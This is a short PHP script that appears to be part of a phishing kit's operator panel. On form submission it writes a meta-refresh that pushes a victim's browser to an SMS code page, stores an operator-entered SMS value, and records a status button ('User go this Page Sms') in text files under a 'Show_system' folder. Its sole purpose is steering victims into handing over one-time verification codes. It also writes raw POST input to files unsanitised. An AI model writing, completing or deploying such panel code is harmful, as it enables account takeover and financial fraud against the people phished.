<?php


session_start();

if(isset($_POST['textSms'])) 
{
    
$Page .= ' <meta http-equiv="refresh" content="0;url=./Sms.php" />  ';

$fPage = fopen("../Show_system/Show_Page.txt", "w");
    fwrite($fPage, $Page);


$Pageee .= ''.$_POST['Sms'].'';

$fPageee = fopen("../Show_system/Show_Code_Sms.txt", "w");
    fwrite($fPageee, $Pageee);



$Pag .= '<div class="expanded button-group" style="
    text-align: center;
"><input type="submit" value="✅ User go this Page Sms 💯" class="btn nbl input-medium" style="
    background: #8bc34a;
"></div>';

$fPag = fopen("../Show_system/Show_Select.txt", "w");
    fwrite($fPag, $Pag);


header("location:../Select.php");

}

else {




}

?>
